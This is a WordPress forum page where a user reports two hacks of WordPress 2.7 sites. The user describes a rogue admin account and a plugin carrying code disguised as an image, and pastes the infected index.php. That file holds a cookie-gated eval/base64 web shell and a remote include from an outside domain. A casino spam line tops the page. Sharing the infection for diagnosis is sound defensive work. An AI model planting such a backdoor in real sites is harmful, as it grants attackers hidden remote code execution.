Grand Slots Palace no deposit bonus.Makakuha ng libreng 700pho sa bawat deposito

Forum Replies Created

Viewing 2 replies - 1 through 2 (of 2 total)

Forum: Everything else WordPress
In reply to: HACKED twice in one week ver 2.7

sunny51
(@sunny51)

16 years, 1 month ago

UPDATE:
Further research showed that there is a plugin that contains malicious code disguised as an image. The plugin is Get Recent Comments..

todo.cache was found in a plugin directory named “Get Recent Comments”.
The “picture” file was found in the Uploads folder, where normal pictures reside…

We are tightening security on the blogs and will update when complete

Forum: Everything else WordPress
In reply to: HACKED twice in one week ver 2.7
sunny51
(@sunny51)

16 years, 1 month ago
Hi,

We also are on HostGator (2 different accounts) and were hacked on 2 of our 2.7 installations. The attack is noticed when you can’t log in to your blog and are send into a loop (no error message either).

Once we check the DB users table we have a new user called WordPress and then I assume there is some new content added to the blog although we were not able to find it. Look for some comment spam and maybe new content.

The second attack from last night was more severe and it seems like the entire blog was reloaded with 2007 version files. I mean EVERY single file on the server is dated 2007. That way we can’t tell which files were changed and we must assume everything is compromised.

The attack includes the addition of these lines into index.php and xmlrpc.php was also changed. This is index.php:
```
<?php if(md5($_COOKIE['c9a8b336f8ead0e0'])=="5dfa4a678793aeaee3d9394d72d12147"){ eval(base64_decode($_POST['file'])); exit; } ?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
if (isset($_GET['license'])) {
	@include('https://wordpress.net.in/license.txt');
} else {
	require('./wp-blog-header.php');
}
?>
```
We are now reinstalling and using a backup copy of the content. We will be tightening the file permissions and will watch closely.

I am worried that there is 2.7 vulnerability that is easily exploitable, if anyone has any ideas please let me know…

THANKS ??

Viewing 2 replies - 1 through 2 (of 2 total)